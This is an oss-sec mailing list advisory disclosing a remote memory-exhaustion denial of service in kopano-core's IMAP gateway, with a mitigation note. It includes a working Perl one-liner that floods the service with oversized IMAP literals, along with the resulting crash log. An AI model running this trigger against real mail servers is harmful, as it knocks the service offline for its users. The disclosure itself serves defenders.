oss-sec mailing list archives
kopano-core 11.0.1.143: Remote DoS with resource exhaustion
From: Jan Engelhardt <jengelh () inai de>
Date: Sat, 1 May 2021 17:07:37 +0200 (CEST)
To the best of my knowledge, this is the initial publication, and there is no CVE number as of this time. # Affected versions * kopano-core 8.5 to 11.0.1.143 The "kopano-gateway" program implements a network service for IMAP. By default, a generous buffer is allocated for string literals, so the service can be triggered to go into an out-of-memory condition. OOM appears to be handled (log msg with "Cannot allocate memory"), but not _consistently_, letting std::bad_alloc escape somewhere, terminating the process and denying further access to the service. # Trigger » ./kopano-gateway -F & » perl -MIO::Socket::INET -e '$a="A"x65536;for(1..99){$s=IO::Socket::INET->new(PeerHost,"localhost",PeerPort,143); $s->write("K {134217727}\r\n");$s->write($a) for 1..2048;push@k,$s;}' 2021-05-01T17:00:03.424598: [error ] Failed to read line: Cannot allocate memory 2021-05-01T17:00:40.489165: [crit ] ---------------------------------------------------------------------- 2021-05-01T17:00:40.489174: [crit ] Fatal error detected. Please report all following information. 2021-05-01T17:00:40.489186: [crit ] kopano-dagent 11.0.1 2021-05-01T17:00:40.489210: [crit ] OS: openSUSE Tumbleweed (Linux 5.12.0-3.g6208a83-default x86_64) 2021-05-01T17:00:40.489217: [crit ] Thread name: kopano-gateway 2021-05-01T17:00:40.489429: [crit ] Peak RSS: 3056660 2021-05-01T17:00:40.489444: [crit ] Pid 31604 caught SIGABRT (6), out of memory or unhandled exception, traceback: terminate called after throwing an instance of 'std::bad_alloc' what(): std::bad_alloc # Mitigation A reduction of the buffer (gateway.cfg:imap_max_messagesize) is possible, but this administrative action equally implies a reduction of the service capabilities offered to end-users (and may be unpopular).
Current thread:
- kopano-core 11.0.1.143: Remote DoS with resource exhaustion Jan Engelhardt (May 01)